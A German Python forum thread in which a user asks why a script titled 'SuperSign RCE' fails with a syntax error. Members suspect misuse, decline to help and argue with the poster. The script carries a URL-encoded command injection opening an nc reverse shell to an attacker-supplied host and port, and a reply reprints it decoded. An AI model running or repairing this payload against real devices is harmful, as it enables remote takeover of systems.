Wo liegt der Fehler?

[Paradisodirekt12]

Hallo,


Ich versuche folgenden Code auszuführen, bekomme aber folgende Fehlermeldung:

SyntaxError: closing parenthesis ']' does not match opening parenthesis '('


Code:

Code: Alles auswählen

import requests
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign RCE")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-l", "--lhost", dest="lhost",
                        help="lhost")
parser.add_argument("-p", "--lport", dest="lport",
                        help="lport")

args = parser.parse_args()

s = requests.get('[http://'+](http://%27+/) str(args.target).replace('\n', '') +'/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150')

Hat sich da was in Python geändert in den letzten Jahren?
Danke für Hilfe!

[/me]

Das kann nicht funktionieren und das hat auch nie funktioniert.

'[http://'+]...
Du hast den String '[http://' und versuchst den jetzt mit etwas zu verketten was syntaktisch keinen Sinn macht.

[Sirius3]

Ich wollte gerade schon helfen, habe dann aber gesehen, was denn da als Parameter übergeben wird.

Code: Alles auswählen

sourceUri = f" -;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f"

Wenn Du Hilfe für illegale Aktivitäten brauchst, dann nicht in einem öffentlichen Forum nachfragen.

[__blackjack__]

Das sieht so aus als wenn das durch irgendein Tool ging, das HTTP-Links erkennt und daraus Markdown-Links macht. Schön das sich Skript-Kiddies so leicht stoppen lassen.

[noisefloor]

Wäre jetzt nur noch interessant zu wissen, welches Programm solche einen GET-Request ohne Murren ausführt, damit man einen Bugreport bei den Entwicklern einrichten könnte.

Gruß, noisefloor

Nachtrag: könnte sich um das SuperSign CMS von LG handeln. Jedenfalls gibt es da in den öffentlich zugänglichen Vulnerability Datenbank Einträge mit Schwachstellen, die ähnlich sind. Die sind aber schon vor längerem gefixt worden. Was ja mit der Aussage des TE passt, dass das "früher" mal funktioniert hat. Mal abgesehen vom offensichtlich niemals lauffähig gewesenem Python-Code.

[__blackjack__]

@noisefloor: Wie gesagt, der war mal lauffähig bevor da etwas drüber ging was versucht hat aus Links im Text einen Markdown-Link zu machen und das lässt sich auch relativ leicht reparieren.

Die `str()`-Aufrufe sind alle überflüssig, ebenso sollte das `replace()` überflüssig sein. Und die URL-Parameter würde ich nicht selbst als Zeichenkette zusammenbasteln, sondern `requests` das überlassen, dann braucht man das auch nicht selbst URL-kodieren und es ist lesbarer/verständlicher.

[Paradisodirekt12]

Ich wollte gerade schon helfen, habe dann aber gesehen, was denn da als Parameter übergeben wird.

Code: Alles auswählen

sourceUri = f" -;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f"

Wenn Du Hilfe für illegale Aktivitäten brauchst, dann nicht in einem öffentlichen Forum nachfragen.

Was für illegale Aktivitäten in meinem eigenem lokalen Netzwerk, an meinem eigenen Gerät?
Hättest du Ahnung, würdest du wissen, dass es nur lokal geht.
Danke für nichts an dich

Das sieht so aus als wenn das durch irgendein Tool ging, das HTTP-Links erkennt und daraus Markdown-Links macht. Schön das sich Skript-Kiddies so leicht stoppen lassen.

Hättest du Ahnung, würdest du wissen, dass es ebenso ein Metasploit-Modul dafür gibt, was es Script-Kiddies sehr einfach macht und auch einwandfrei funktioniert:
https://www.exploit-db.com/exploits/46795

Ich wollte einfach nur den Code verstehen und es manuell machen.
Danke an den Rest!

[noisefloor]

Was für illegale Aktivitäten in meinem eigenem lokalen Netzwerk, an meinem eigenen Gerät?

Mal so rein Interesse halber: wie viele Server hast du den in deinem lokalen Netzwerk, dass es sich lohnt, ein Skript mit parametrierten IP-Adressen zu schreiben, anstatt das hardcoded in den Quelltext zu hämmern?

Und wenn das nur lokal läuft verrätst du bestimmt auch gerne, bei welcher Webanwendung der Exploit funktionieren soll. Und nein, ich kann den von dir genannten Link nicht öffnen, weil der Fx sich weigert, den Link zu öffnen, weil etwas mit dem SSL Zertifikat auf der Seite nicht stimmt. Was aber irgendwie ins Gesamtbild passt.

Gruß, noisefloor

[Paradisodirekt12]

...
Gruß, noisefloor

Ok... ich habe das schon erwartet in diesem Forum

Also, Es spielt keine Rolle wieviele Server ich in dem Netzwerk habe, da ich den Skript nicht geschrieben habe, sondern er seit 2018 öffentlich zugänglich ist.
Es funktioniert nur lokal, weil Port 9080 auf dem Gerät nur von innerhalb des lokalen Netzwerks zugänglich ist, man kommt da von außen nicht ran, es sei dann man stellt ein forwarding im Gateway ein!

Dass der Link nicht funktioniert muss ein Troll von dir sein. Ansonsten würde ich an deiner Stelle mal meinen Traffic analysieren und den Fx überprüfen

[__blackjack__]

@Paradisodirekt12: Wir wissen nicht ob Du das in Deinem eigenen Netzwerk an Deinem eigenen Gerät machen willst. Was wir wissen ist, dass Du offenbar nicht programmieren kannst, sondern dir von irgendwo aus dem Netz Code kopiert hast, zum Hacken eines Geräts, mit einem sehr offensichtlichen Fehler der leicht behebbar ist, wo man sogar relativ leicht erkennen kann wie der zustande gekommen ist. Und da entfernst Du dann den ganzen Kontext, kippst den Code hier im Forum ab, und möchtest den offenbar repariert bekommen. Und Du reagierst pampig wenn die Zweifelhaftigkeit des Code angemerkt wird. Also typisch Skript-Kiddie.

Die Zeit, die Du auf die beleidigten Antworten verwendet hast, hättest Du auch nutzen können das Programm zu korrigieren.

[Paradisodirekt12]

...

Das könnt ihr auch nicht wissen, deshalb habe ich es explizit ausgeführt!
Ich bin kein Programmierer, richtig, deswegen habe ich Hilfe bei Programmieren gesucht, niemand kann ja alles.
In Sachen Netzwerktechnik/-Sicherheit stecke ich bestimmt 80% hier in die Tasche, tut aber nichts zu Sache.
Es ist klar, dass ein Programmierer, der seit Jahren jeden Tag mit Python arbeitet den Fehler sofort sieht, war mir klar, deswegen habe ich hier gefragt.
Wo reagiere ich pampig?
Mir wird untersellt ich hätte etwas illegales vor und mein Link wäre kompromitiert. Jeder mit 1% Ahnung kann feststellen, dass der Link legitim ist. Ich würde das als ""pampig" bezeichnen.
Will mich auch gar nicht mit irgendwem streiten, aber diese Unterstellungen, ohne irgendetwas zu wissen müssen nicht sein

[__blackjack__]

@Paradisodirekt12: Doch die müssen sein, eben weil wir es nicht wissen. Und Du kannst das auch nicht einfach entkräften in dem Du sagst Du willst damit nix böses machen. Genau das würde ja jemand sagen der was böses vorhat.

Hast Du Dir schon gedacht und alle haben keine Ahnung, klingt halt pampig und als wenn das Skript-Kiddie auch woanders schon erfolglos war.

[narpfel]

Hmm, wie man von

Und nein, ich kann den von dir genannten Link nicht öffnen, weil der Fx sich weigert, den Link zu öffnen, weil etwas mit dem SSL Zertifikat auf der Seite nicht stimmt.

auf

Mir wird untersellt [...] mein Link wäre kompromitiert.

kommt, kann ich nicht nachvollziehen. Für mich klingt das vielmehr so, als wäre da ein Zertifikat abgelaufen oder revoket. Aber vielleicht gehöre ich auch einfach nur zu den 80% und verstehe das deswegen nicht...

Edit: Zweites Zitat etwas vollständiger gemacht.

[Paradisodirekt12]

@Paradisodirekt12: ...

Ich kann es aber entkräften, indem ich aufzeige, dass es nur im lokalen Netzwerk geht, was schon mal viele Dinge ausschließt.
Wenn ich also Zugang in ein lokales Netzwerk etabliert habe, und dieses Netzwerk nicht mir gehören würde, hätte ich ja sowieso schon etwas "illegales" gemacht.
In wieviele lokale Netzwerke sollte ich Zugang etablieren, um einen größeren Schaden anrichten zu können?
Allein diese Vorarbeit würde diese "Kleinigkeit" an Problem bei weitem übertreffen, das muss doch verstanden werden?!
Tut mir Leid wenn es pampig rüber kam, wir sind alle etwas genervt und die Köpfe rauchen bei den meisten. Mir ist bewusst wo ich mir hier befinde.

Hmm, wie man von

Und nein, ich kann den von dir genannten Link nicht öffnen, weil der Fx sich weigert, den Link zu öffnen, weil etwas mit dem SSL Zertifikat auf der Seite nicht stimmt.

auf

Mir wird untersellt [...] mein Link wäre kompromitiert.

kommt, kann ich nicht nachvollziehen. Für mich klingt das vielmehr so, als wäre da ein Zertifikat abgelaufen oder revoket. Aber vielleicht gehöre ich auch einfach nur zu den 80% und verstehe das deswegen nicht...

Edit: Zweites Zitat etwas vollständiger gemacht.

Ja, dann gehörst du tatsächlich zu den 80%!
Ein SSL-Zertifikat-Fehler ist meist ein Hinweis, dass etwas mit dem Netzwerkeinstellungen nicht stimmt, z.B. bei einem MITM-Angriff würde man diesen Fehler angezeigt bekommen.
Das Zertifikat ist 100% nicht abgelaufen.

[noisefloor]

und mein Link wäre kompromitiert.

Das entspringt deiner Fantasie und habe zumindest ich nicht gesagt. Das sich der Fx weigert hat was mit den Fx Einstellungen, dem I-Net Zugang zu dem Zeitpunkt von mir und dem SSL Zertifikat der Seite zu tun. Hat mir dir nichts zu tun.

Gruß, noisefloor

[narpfel]

Ja, dann gehörst du tatsächlich zu den 80%!
Ein SSL-Zertifikat-Fehler ist meist ein Hinweis, dass etwas mit dem Netzwerkeinstellungen nicht stimmt, z.B. bei einem MITM-Angriff würde man diesen Fehler angezeigt bekommen.
Das Zertifikat ist 100% nicht abgelaufen.

Ah, okay. Eine Frage noch: Wieso würde ein MITM-Angriff (oder allgemein Netzwerkeinstellungen, die nicht stimmen; ein MITM-Angriff ist ja laut dieser Beschreibung ein Beispiel von nicht stimmenden Netzwerkeinstellungen) bedeuten, dass dein Link (ich interpretiere das als die Seite, auf die du verlinkt hast) kompromittiert ist?

Und da dich mit dem Thema ja auskennst: Wie stelle ich meine Netzwerkeinstellungen so ein, dass MITM-Angriffe nicht auftreten?

[Paradisodirekt12]

Das entspringt deiner Fantasie und habe zumindest ich nicht gesagt. Das sich der Fx weigert hat was mit den Fx Einstellungen, dem I-Net Zugang zu dem Zeitpunkt von mir und dem SSL Zertifikat der Seite zu tun. Hat mir dir nichts zu tun.

Gruß, noisefloor

Sage ich ja!

Validity
Not Before
Wed, 18 Sep 2024 10:51:01 GMT
Not After
Thu, 18 Sep 2025 10:51:01 GMT

Ah, okay. Eine Frage noch: Wieso würde ein MITM-Angriff (oder allgemein Netzwerkeinstellungen, die nicht stimmen; ein MITM-Angriff ist ja laut dieser Beschreibung ein Beispiel von nicht stimmenden Netzwerkeinstellungen) bedeuten, dass dein Link (ich interpretiere das als die Seite, auf die du verlinkt hast) kompromittiert ist?

Ich weiß nicht, die Art und Weise wie du mir das an den Kopf geworfen hast, kam so rüber.

Und da dich mit dem Thema ja auskennst: Wie stelle ich meine Netzwerkeinstellungen so ein, dass MITM-Angriffe nicht auftreten?

Muss dich enttäuschen, das geht nicht, wenn man es richtig macht